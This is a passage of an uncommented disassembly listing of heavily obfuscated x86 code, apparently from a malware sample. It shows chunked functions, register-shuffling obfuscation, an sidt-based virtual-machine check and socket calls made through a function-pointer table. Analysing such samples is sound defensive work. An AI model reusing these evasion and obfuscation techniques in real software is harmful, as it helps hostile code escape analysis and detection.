pop eax
sub eax, ebx
cmp eax, 400h
jb loc_9B1856
jmp loc_9B1850
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1A08
loc_9AF398: ; CODE XREF: sub_9B1A08-457C�j
; sub_9B1A08-3077�j ...
mov esi, [ebp+var_41EC]
push esi
pop edi
neg edi
sbb edi, edi
and edi, 0FA0h
add edi, 3E8h
mov [ebp+var_41FC], edi
call sub_9AB574
mov [ebp+var_420C], eax
cmp eax, 0FFFFFFFFh
jnz loc_9B4444
jmp loc_9B606C
; END OF FUNCTION CHUNK FOR sub_9B1A08
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B2F1C
loc_9AF3D0: ; CODE XREF: sub_9B2F1C-D37�j
; DATA XREF: .text:off_9BA8F3�o
mov [esi+eax], edi
add eax, 4
mov [ebp-1Ch], eax
loc_9AF3D9: ; CODE XREF: sub_9B2F1C-D3D�j
test bl, 20h
jz loc_9AF57D
jmp loc_9AF570
; END OF FUNCTION CHUNK FOR sub_9B2F1C
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_9AF3E8 proc near ; CODE XREF: sub_9ABF08+35�p
; sub_9B2160-2E2A�p ...
; FUNCTION CHUNK AT 009B51AC SIZE 00000014 BYTES
or eax, eax
jnz loc_9B51AF
jmp loc_9B51AC
sub_9AF3E8 endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ACEE8
loc_9AF3F8: ; CODE XREF: sub_9ACEE8-15A9�j
lea edi, [ebp-0B0h]
sub eax, eax
mov ecx, 24h
rep stosd
stosw
stosb
loc_9AF40A: ; CODE XREF: sub_9ACEE8-15AF�j
; sub_9ACEE8+2541�j
call sub_9B45AC
mov ecx, 93h
sub edx, edx
div ecx
push edx
pop esi
mov [ebp-0E4h], esi
mov al, [esi+ebp-0B0h]
and al, al
jnz short loc_9AF40A
jmp loc_9AF51C
; END OF FUNCTION CHUNK FOR sub_9ACEE8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B3864
loc_9AF430: ; CODE XREF: sub_9B3864-2ADD�j
; DATA XREF: .text:off_9B96E8�o
mov dl, [ebp+var_2024]
and dl, 1
mov [ebp+var_203D], dl
jnz loc_9AD9F8
jmp off_9BAC67
; END OF FUNCTION CHUNK FOR sub_9B3864
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9AF44C: ; CODE XREF: sub_9B0930+28F0�j
; DATA XREF: .text:off_9BADF8�o
push off_9B98D1
push dword ptr [eax]
pop ecx
push ecx
call esi
mov edx, dword_9BCB74
push dword ptr [edx]
pop ecx
mov [ecx+48h], eax
push dword_9BCB74
pop edx
push dword ptr [edx]
pop eax
push dword ptr [eax+48h]
pop ecx
test ecx, ecx
jz loc_9B23EF
jmp off_9B89E1
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B3864
loc_9AF480: ; CODE XREF: sub_9B3864-86DA�j
; sub_9B3864-7E34�j ...
mov ecx, [ebp+var_2044]
mov dword ptr [ecx], 0
jmp loc_9AE0D3
; END OF FUNCTION CHUNK FOR sub_9B3864
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AD3EC
loc_9AF494: ; CODE XREF: sub_9AD3EC+50�j
imul eax, 343FDh
add eax, 269EC3h
mov ecx, edx
mov esi, edx
and ecx, 1Fh
mov edi, 1
shr esi, 5
mov [ebp-1Ch], eax
lea esi, [ebp+esi*4-30h]
shl edi, cl
not edi
and edi, [esi]
mov ebx, eax
jmp off_9B8C68
; END OF FUNCTION CHUNK FOR sub_9AD3EC
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B03E8
loc_9AF4C4: ; CODE XREF: sub_9B03E8+5E55�j
push ecx
sidt fword ptr [esp+8+var_A]
pop dword ptr [ebp-154h]
push dword ptr [ebp-154h]
pop eax
cmp eax, 0D0000000h
ja loc_9B6224
jmp loc_9B2AD4
; END OF FUNCTION CHUNK FOR sub_9B03E8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ADDA4
loc_9AF4E8: ; CODE XREF: sub_9ADDA4-1219�j
mov [ebp+edi*4-27Ch], eax
inc edi
mov [ebp-30h], edi
loc_9AF4F3: ; CODE XREF: sub_9ADDA4-121F�j
inc ecx
jmp loc_9ADDD8
; END OF FUNCTION CHUNK FOR sub_9ADDA4
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AEC20
loc_9AF4FC: ; CODE XREF: sub_9AEC20+9D�j
; DATA XREF: .text:off_9BAA9D�o
pop ebx
push esi
pop ecx
and ebx, 7FFFFFFFh
call sub_9AEE5C
and eax, 7FFFFFFFh
cmp eax, ebx
jbe loc_9B3003
jmp loc_9B2FEC
; END OF FUNCTION CHUNK FOR sub_9AEC20
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9ACEE8
loc_9AF51C: ; CODE XREF: sub_9ACEE8+2543�j
inc al
mov [esi+ebp-0B0h], al
lea edx, [ebp-0C8h]
push edx
lea eax, [ebp-0CCh]
push eax
push off_9B9270
mov ecx, off_9B9A94[esi*4]
push ecx
lea edx, [ebp-0D0h]
lea ecx, [ebp-0D4h]
call sub_9B63D8
mov [ebp-0C0h], eax
mov ecx, [ebp-0CCh]
cmp ecx, 0C8h
jb loc_9ACAF8
jmp off_9B96E4
; END OF FUNCTION CHUNK FOR sub_9ACEE8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B2F1C
loc_9AF570: ; CODE XREF: sub_9B2F1C-3B3A�j
push dword ptr [ebp+24h]
pop edx
mov [esi+eax], edx
add eax, 4
mov [ebp-1Ch], eax
loc_9AF57D: ; CODE XREF: sub_9B2F1C-3B40�j
test bl, 40h
jz loc_9B2310
jmp off_9B8DDF
; END OF FUNCTION CHUNK FOR sub_9B2F1C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9AF960
loc_9AF58C: ; CODE XREF: sub_9AF960+1A05�j
; DATA XREF: .text:off_9B8FC4�o
push edx
pop ecx
shr ecx, 2
push eax
pop esi
rep movsd
push edx
pop ecx
and ecx, 3
rep movsb
; END OF FUNCTION CHUNK FOR sub_9AF960
; START OF FUNCTION CHUNK FOR sub_9B27D8
loc_9AF59C: ; CODE XREF: sub_9B27D8-7473�j
mov edx, dword_9BCB74
mov eax, [edx]
push off_9B8ED2
call dword ptr [eax+18h]
mov eax, off_9B97DD
call sub_9AD7A4
mov ecx, dword_9BCB74
mov edx, [ecx]
push off_9B8ED2
push eax
pop esi
call dword ptr [edx+1Ch]
push esi
pop eax
mov ecx, 14h
sub edx, edx
div ecx
and edx, edx
jnz loc_9B01A7
jmp sub_9ADB10
; END OF FUNCTION CHUNK FOR sub_9B27D8
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_9AF5E4 proc near ; CODE XREF: sub_9B27D8-746D�j
; DATA XREF: .text:off_9BAC25�o
; FUNCTION CHUNK AT 009AD704 SIZE 00000067 BYTES
; FUNCTION CHUNK AT 009AD8F4 SIZE 00000061 BYTES
; FUNCTION CHUNK AT 009B09DC SIZE 0000000C BYTES
; FUNCTION CHUNK AT 009B14B8 SIZE 00000012 BYTES
push ebx
pop edi
dec edi
loc_9AF5E7: ; CODE XREF: sub_9AF5E4+9�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_9AF5E7
jmp loc_9AD704
sub_9AF5E4 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9AF960
loc_9AF5F4: ; CODE XREF: sub_9AF960+D�j
mov ecx, edx
push eax
pop esi
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
push dword_9BCB74
pop edx
push dword ptr [edx]
pop eax
push offset dword_9BBE40
call dword ptr [eax+18h]
mov eax, off_9B97DD
call sub_9AD7A4
push dword_9BCB74
pop ecx
mov edx, [ecx]
push off_9B8ED2
mov esi, eax
call dword ptr [edx+1Ch]
mov eax, esi
xor edx, edx
push 9
pop ecx
div ecx
push off_9BA804[edx*4]
pop edx
mov eax, edx
loc_9AF647: ; CODE XREF: sub_9AF960-314�j
mov cl, [edx]
inc edx
test cl, cl
jnz short loc_9AF647
jmp loc_9B1358
; END OF FUNCTION CHUNK FOR sub_9AF960
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_9AF654 proc near ; CODE XREF: sub_9AF25C-3DE6�p
; sub_9AF25C+545A�p
; FUNCTION CHUNK AT 009AEB6C SIZE 0000000C BYTES
; FUNCTION CHUNK AT 009B06EB SIZE 0000001D BYTES
; FUNCTION CHUNK AT 009B075C SIZE 00000048 BYTES
; FUNCTION CHUNK AT 009B2654 SIZE 0000001F BYTES
push ebp
push esp
pop ebp
push 0FFFFFFFFh
push off_9B8ED6
push off_9B8CBD
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0Ch
push ebx
push esi
push edi
xor eax, eax
mov [ebp-18h], esp
mov [ebp-1Ch], eax
mov [ebp-4], eax
mov ecx, [edx]
cmp ecx, 340h
jb loc_9B06EB
jmp loc_9B075C
sub_9AF654 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_9AF698 proc near ; CODE XREF: sub_9AB1A0+AAC1�p
; sub_9B0FD0+4D88�p
; FUNCTION CHUNK AT 009AB82C SIZE 00000005 BYTES
mov eax, dword_9BCB74
mov ecx, [eax]
call dword ptr [ecx+30h]
sub eax, dword_9BEBD8
cmp eax, 2BF20h
jbe nullsub_8
jmp loc_9AB82C
sub_9AF698 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B5904
loc_9AF6B8: ; CODE XREF: sub_9B5904-156F�j
inc eax
jmp loc_9B12A3
; END OF FUNCTION CHUNK FOR sub_9B5904
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9AF6C0: ; CODE XREF: sub_9B63D8-1526�j
; DATA XREF: .text:off_9BAAFD�o
mov dword ptr [ebp-2134h], 1
jmp loc_9AF94B
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9AF6D0: ; CODE XREF: sub_9B0930+4306�j
push off_9B97C1
mov ecx, [eax]
push ecx
call esi
push dword_9BCB74
pop edx
push dword ptr [edx]
pop ecx
mov [ecx+40h], eax
mov edx, dword_9BCB74
mov eax, [edx]
push dword ptr [eax+40h]
pop ecx
test ecx, ecx
jz loc_9B23EF
jmp off_9B8824
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
mov edi, edi
; =============== S U B R O U T I N E =======================================
sub_9AF704 proc near ; CODE XREF: sub_9B03E8+27A0�p
; FUNCTION CHUNK AT 009B2C44 SIZE 00000008 BYTES
push ebp
push esp
pop ebp
push 0FFFFFFFFh
push off_9B9020
push off_9B8CBD
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp-18h], esp
sub eax, eax
mov [ebp-1Ch], eax
jmp off_9B9534
sub_9AF704 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AE860
loc_9AF738: ; CODE XREF: sub_9AE860-264D�j
push 5Ch
pop ecx
sub edx, edx
div ecx
push edx
pop ecx
push 5Ch
pop esi
xor edx, edx
div esi
mov [ebp+var_1C], edx
mov [ebp+var_20], ecx
push off_9BA1D0[ecx*4]
pop ecx
mov eax, [ebp+arg_8]
push eax
pop esi
loc_9AF75B: ; CODE XREF: sub_9AE860+F03�j
mov bl, [ecx]
mov [esi], bl
inc ecx
inc esi
and bl, bl
jnz short loc_9AF75B
jmp off_9BA9FD
; END OF FUNCTION CHUNK FOR sub_9AE860
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B3864
loc_9AF76C: ; CODE XREF: sub_9B3864-724C�j
; DATA XREF: .text:off_9B9139�o
lea edx, [ebp+var_203C]
mov [ebp+var_2054], edx
jmp loc_9AEB96
; END OF FUNCTION CHUNK FOR sub_9B3864
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B1A08
loc_9AF780: ; CODE XREF: sub_9B1A08+386C�j
; DATA XREF: .text:off_9BA488�o
mov edx, dword_9BCB74
push dword ptr [edx]
pop eax
call dword ptr [eax+30h]
mov [ebp+var_4204], eax
loc_9AF792: ; CODE XREF: sub_9B1A08+3866�j
lea esi, [esi+esi*4]
shl esi, 3
lea ecx, [esi+ebp-41DCh]
push [ebp+var_402C]
pop edx
mov [ecx], edx
push [ebp+var_4028]
pop eax
mov [ecx+4], eax
mov edx, [ebp+var_4024]
mov [ecx+8], edx
push [ebp+var_4020]
pop eax
mov [ecx+0Ch], eax
lea ecx, [esi+ebp-41CCh]
mov edx, [ebp+var_403C]
mov [ecx], edx
push [ebp+var_4038]
pop eax
mov [ecx+4], eax
push [ebp+var_4034]
pop edx
mov [ecx+8], edx
push [ebp+var_4030]
pop eax
mov [ecx+0Ch], eax
mov eax, edi
mov [esi+ebp-41B8h], edi
call sub_9AF3E8
jmp loc_9AB158
; END OF FUNCTION CHUNK FOR sub_9B1A08
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B3864
loc_9AF808: ; CODE XREF: sub_9B3864-6674�j
and edx, edx
jnz loc_9B0D78
jmp off_9B9260
; END OF FUNCTION CHUNK FOR sub_9B3864
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9AF818: ; CODE XREF: sub_9B0930+3118�j
push off_9BAD5D
mov eax, [eax]
push eax
call esi
push dword_9BCB74
pop ecx
push dword ptr [ecx+10h]
pop edx
mov [edx+3Ch], eax
push dword_9BCB74
pop eax
push dword ptr [eax+10h]
pop eax
push dword ptr [eax+3Ch]
pop ecx
and ecx, ecx
jz loc_9B23EF
jmp off_9BA7E1
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 10h
mov eax, 1
retn
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AB1A0
loc_9AF858: ; CODE XREF: sub_9AB1A0+2B35�j
; DATA XREF: .text:off_9BA3F8�o
call sub_9B45AC
sub edx, edx
div dword ptr [ebp-30h]
test edx, edx
jnz loc_9B5B2C
jmp loc_9AC030
; END OF FUNCTION CHUNK FOR sub_9AB1A0
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B3864
loc_9AF870: ; CODE XREF: sub_9B3864-7E2E�j
mov eax, [ebp+var_2020]
or eax, eax
jz loc_9B3D6C
jmp loc_9AF480
; END OF FUNCTION CHUNK FOR sub_9B3864
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AD97C
loc_9AF884: ; CODE XREF: sub_9AD97C+28A2�j
push dword_9BCB74
pop edx
push dword ptr [edx+0Ch]
pop eax
mov ecx, [ebp+10h]
push ecx
mov edx, [ebp-1Ch]
push edx
call dword ptr [eax+1Ch]
or eax, eax
jnz loc_9AC18B
jmp off_9B9E44
; END OF FUNCTION CHUNK FOR sub_9AD97C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B0D34
loc_9AF8A8: ; CODE XREF: sub_9B0D34+1A�j
mov ecx, dword_9BCB74
mov eax, [esp+arg_4]
mov edx, [ecx+10h]
mov ecx, [esp+arg_0]
push 0
push eax
push ecx
push esi
call dword ptr [edx+44h]
or eax, eax
jge loc_9B2D84
jmp loc_9B19BC
; END OF FUNCTION CHUNK FOR sub_9B0D34
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B1D80
loc_9AF8D0: ; CODE XREF: sub_9B1D80-4B62�j
push edx
call sub_9AFCA0
add esp, 4
test eax, eax
jz loc_9B1D5B
jmp loc_9ADE34
; END OF FUNCTION CHUNK FOR sub_9B1D80
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AE400
loc_9AF8E8: ; CODE XREF: sub_9AE400+39�j
push [ebp+arg_4]
pop eax
push eax
push [ebp+arg_0]
pop ecx
push ecx
call sub_9A5033
add esp, 8
and eax, eax
jz loc_9B43AB
jmp loc_9AE1B8
; END OF FUNCTION CHUNK FOR sub_9AE400
; ---------------------------------------------------------------------------
align 4
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9AF90B: ; CODE XREF: sub_9B63D8-76A4�j
; sub_9B63D8-70C0�j
mov dword ptr [ebp-4], 0FFFFFFFFh
push dword ptr [ebp-2134h]
pop eax
push dword ptr [ebp-10h]
pop ecx
mov large fs:0, ecx
pop edi
pop esi
pop ebx
push dword ptr [ebp-1Ch]
pop ecx
xor ecx, ebp
call sub_9AAAC1
mov esp, ebp
pop ebp
retn 10h
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B1584
loc_9AF938: ; CODE XREF: sub_9B1584+91�j
; DATA XREF: .text:off_9B9DF7�o
push esi
call sub_9ABE84
inc esi
jmp loc_9B1609
; END OF FUNCTION CHUNK FOR sub_9B1584
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9AF944: ; CODE XREF: sub_9B63D8-B30E�j
; sub_9B63D8-AE16�j ...
push dword ptr [ebp-2128h]
pop ebx
loc_9AF94B: ; CODE XREF: sub_9B63D8:loc_9AB5D0�j
; sub_9B63D8-ACD2�j ...
mov eax, [ebp-2138h]
or eax, eax
jz loc_9AE7BE
jmp loc_9AB2C8
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_9AF960 proc near ; CODE XREF: sub_9AF5E4-1C95�j
; DATA XREF: .text:off_9B8945�o
; FUNCTION CHUNK AT 009AF58C SIZE 00000010 BYTES
; FUNCTION CHUNK AT 009AF5F4 SIZE 0000005F BYTES
; FUNCTION CHUNK AT 009B1358 SIZE 00000013 BYTES
push ebx
pop edi
sub edx, eax
dec edi
loc_9AF965: ; CODE XREF: sub_9AF960+B�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_9AF965
jmp loc_9AF5F4
sub_9AF960 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B43F4
loc_9AF974: ; CODE XREF: sub_9B43F4-6E9D�j
mov edx, [ebp+18h]
push edx
push edi
push dword ptr [ebp+10h]
pop eax
push eax
movzx ecx, word ptr [ebx+1Ah]
mov edx, [ebx+1Ch]
push edx
call sub_9ACF9C
jmp loc_9ACEAF
; END OF FUNCTION CHUNK FOR sub_9B43F4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B1A08
loc_9AF990: ; CODE XREF: sub_9B1A08-28E3�j
; DATA XREF: .text:off_9B9300�o
call sub_9AC448
mov dword ptr [esi], 0
loc_9AF99B: ; CODE XREF: sub_9B1A08-28E9�j
inc edi
mov [ebp+var_41E8], edi
jmp loc_9B17D5
; END OF FUNCTION CHUNK FOR sub_9B1A08
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1A08
loc_9AF9A8: ; CODE XREF: sub_9B1A08+2EE3�j
; DATA XREF: .text:off_9BAF63�o
test al, 10h
jz loc_9B16BE
jmp loc_9AD5C8
; END OF FUNCTION CHUNK FOR sub_9B1A08
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B03E8
loc_9AF9B8: ; CODE XREF: sub_9B03E8+55�j
xor edi, edi
jmp loc_9B620A
; END OF FUNCTION CHUNK FOR sub_9B03E8
; ---------------------------------------------------------------------------
align 10h
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9B3FF8
loc_9AF9C3: ; CODE XREF: sub_9B3FF8-8D74�j
; sub_9B3FF8-176D�j
mov [ebp+var_4], 0FFFFFFFFh
push [ebp+var_1C]
pop eax
push [ebp+var_10]
pop ecx
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_9B3FF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9AF9E0: ; CODE XREF: sub_9B63D8-64DF�j
mov cl, [ebp-2115h]
cmp cl, 30h
jl loc_9AF944
jmp loc_9B5E4C
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9ADAC4
loc_9AF9F4: ; CODE XREF: sub_9ADAC4+5656�j
inc eax
jmp loc_9AD654
; END OF FUNCTION CHUNK FOR sub_9ADAC4
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ADAC4
loc_9AF9FC: ; CODE XREF: sub_9ADAC4+4768�j
push 0
lea eax, [ebp-5Ch]
lea esi, [ebp-2Ch]
xor edx, edx
call sub_9B1334
push dword_9BCB74
pop eax
mov ecx, [eax+10h]
lea edx, [ebp-5Ch]
push edx
mov eax, esi
push eax
push ebx
call dword ptr [ecx+14h]
push eax
pop edi
mov [ebp-88h], edi
or edi, edi
jz loc_9AE6B5
jmp loc_9B2AF8
; END OF FUNCTION CHUNK FOR sub_9ADAC4
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B2118
loc_9AFA38: ; CODE XREF: sub_9B2118+3F�j
; DATA XREF: .text:off_9BA786�o
call sub_9B14CC
and eax, eax
jz loc_9B034B
jmp loc_9B2AE4
; END OF FUNCTION CHUNK FOR sub_9B2118
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AD11C
loc_9AFA4C: ; CODE XREF: sub_9AD11C-17F4�j
; DATA XREF: .text:off_9BAD27�o
and al, 10h
neg al
sbb eax, eax
and eax, 3
inc eax
loc_9AFA56: ; CODE XREF: sub_9AD11C-17FA�j
mov edi, eax
loc_9AFA58: ; CODE XREF: sub_9AD11C+62B7�j
; sub_9AD11C+65A7�j
push dword_9BCB74
pop edx
lea ecx, [esp+18h+var_14]
push ecx
push 8004667Eh
mov [esp+20h+var_14], 0
mov eax, [edx+10h]
push esi
call dword ptr [eax+54h]
and eax, eax
push 1
pop eax
jnz loc_9AD1FA
jmp off_9B96D8
; END OF FUNCTION CHUNK FOR sub_9AD11C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AC128
loc_9AFA8C: ; CODE XREF: sub_9AC128+9�j
mov ecx, dword_9BCB74
mov [esp+4+var_4], 10h
push dword ptr [ecx+10h]
pop edx
lea ecx, [esp+4+var_4]
push ecx
push eax
push esi
call dword ptr [edx+2Ch]
loc_9AFAA6: ; CODE XREF: sub_9AC128+3�j
test edi, edi
jz loc_9B5E48
jmp loc_9B5E2C
; END OF FUNCTION CHUNK FOR sub_9AC128
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9AFAB4: ; CODE XREF: sub_9B63D8-9864�j
mov edx, dword_9BCB74
push dword ptr [edx+14h]
pop eax
push 12h
push off_9BA16C
lea ecx, [esi+ebp-2120h]
push ecx
call dword ptr [eax+4]
add esp, 0Ch
test eax, eax
jnz loc_9B2234
jmp loc_9ACBA0
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B562C
loc_9AFAE4: ; CODE XREF: sub_9B562C-8175�j
; DATA XREF: .text:off_9BAC79�o
mov edx, dword_9BCB74
push dword ptr [edx+18h]
pop eax
push esi
push edi
push ebx
lea ecx, [ebp+var_124]
push ecx
call dword ptr [eax+8]
test eax, eax
jz loc_9AE77C
jmp loc_9AF144
; END OF FUNCTION CHUNK FOR sub_9B562C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B4FD0
loc_9AFB08: ; CODE XREF: sub_9B4FD0-4529�j
; DATA XREF: .text:off_9B989F�o
mov edx, [ebp+20h]
cmp dword_9BBF90[eax], edx
jnz loc_9AB8C4
jmp loc_9AFDAC
; END OF FUNCTION CHUNK FOR sub_9B4FD0
; =============== S U B R O U T I N E =======================================
sub_9AFB1C proc near ; CODE XREF: sub_9B43F4-6EAC�p
; FUNCTION CHUNK AT 009ACDB4 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 009AE7D4 SIZE 00000030 BYTES
; FUNCTION CHUNK AT 009B02CB SIZE 00000018 BYTES
; FUNCTION CHUNK AT 009B18CC SIZE 0000001B BYTES
; FUNCTION CHUNK AT 009B28F0 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 009B3B9C SIZE 0000002B BYTES
; FUNCTION CHUNK AT 009B5DA8 SIZE 00000029 BYTES
push ebp
push esp
pop ebp
push 0FFFFFFFFh
push off_9B91AE
push off_9B8CBD
push large dword ptr fs:0
pop eax
push eax
mov large fs:0, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp-18h], esp
mov edi, edx
mov esi, ecx
push 0Ah
pop eax
mov bx, [edi+8]
jmp off_9B9373
sub_9AFB1C endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1F68
loc_9AFB58: ; CODE XREF: sub_9B1F68-12A9�j
; DATA XREF: .text:off_9B89C2�o
push 0
push esi
call sub_9B0E7C
push esi
loc_9AFB61: ; CODE XREF: sub_9B1F68-6190�j
push dword_9BCB74
pop edx
mov eax, [edx+10h]
call dword ptr [eax+38h]
mov dword ptr [ebx], 0
loc_9AFB74: ; CODE XREF: sub_9B1F68-687A�j
; sub_9B1F68-21E0�j ...
mov edi, [ebp-34h]
inc edi
jmp loc_9B01E0
; END OF FUNCTION CHUNK FOR sub_9B1F68
; ---------------------------------------------------------------------------
align 10h
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9B3984
loc_9AFB83: ; CODE XREF: sub_9B3984-80DA�j
mov [ebp+var_4], 0FFFFFFFFh
mov ecx, dword_9BCB74
mov edx, [ecx]
push 0
call dword ptr [edx+60h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
sub eax, eax
pop edi
pop esi
pop ebx
push [ebp+var_1C]
pop ecx
xor ecx, ebp
call sub_9AAAC1
mov esp, ebp
pop ebp
retn 4
; END OF FUNCTION CHUNK FOR sub_9B3984
; ---------------------------------------------------------------------------
align 4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push off_9B94BB
push off_9B8CBD
push large dword ptr fs:0
pop eax
push eax
mov large fs:0, esp
sub esp, 8
push ebx
push esi
push edi
mov [ebp-18h], esp
mov dword ptr [ebp-4], 0
mov ecx, off_9BA8D0
call sub_9B31A8
call sub_9AD01C
jmp loc_9B10BF
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9AFC00: ; CODE XREF: sub_9B0930-3D1F�j
push off_9B88CC
mov eax, [eax+4]
push dword ptr [eax]
pop ecx
push ecx
call esi
mov edx, dword_9BCB74
push dword ptr [edx+4]
pop ecx
mov [ecx+4], eax
push dword_9BCB74
jmp off_9BAF3C
; END OF FUNCTION CHUNK FOR sub_9B0930
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AFC28 proc near ; CODE XREF: sub_9ACF9C+5DCB�p
; sub_9B3E24+16�p
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
; FUNCTION CHUNK AT 009AB774 SIZE 00000036 BYTES
; FUNCTION CHUNK AT 009ADF17 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 009AEB00 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 009AF19C SIZE 0000002D BYTES
; FUNCTION CHUNK AT 009B0888 SIZE 00000073 BYTES
; FUNCTION CHUNK AT 009B0DE4 SIZE 0000000E BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push off_9B9EC4
push off_9B8CBD
push large dword ptr fs:0
pop eax
push eax
mov large fs:0, esp
sub esp, 14h
push ebx
push esi
push edi
push ecx
pop esi
mov [ebp+var_18], esp
mov [ebp+var_4], 0
mov eax, 20h
call sub_9AF3E8
push eax
pop ebx
mov [ebp+var_1C], ebx
or ebx, ebx
jz loc_9ADF17
jmp off_9BA3D0
sub_9AFC28 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9AC6DC
loc_9AFC78: ; CODE XREF: sub_9AC6DC-C28�j
mov ecx, dword_9BBD20
add ecx, 14h
cmp ecx, 64h
jle loc_9B1831
jmp off_9B97FA
; END OF FUNCTION CHUNK FOR sub_9AC6DC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B3864
loc_9AFC90: ; CODE XREF: sub_9B3864-4762�j
; sub_9B3864+1A47�j
sub eax, eax
push eax
push eax
push eax
push eax
push eax
push ebx
push eax
jmp loc_9B3D79
; END OF FUNCTION CHUNK FOR sub_9B3864
; ---------------------------------------------------------------------------
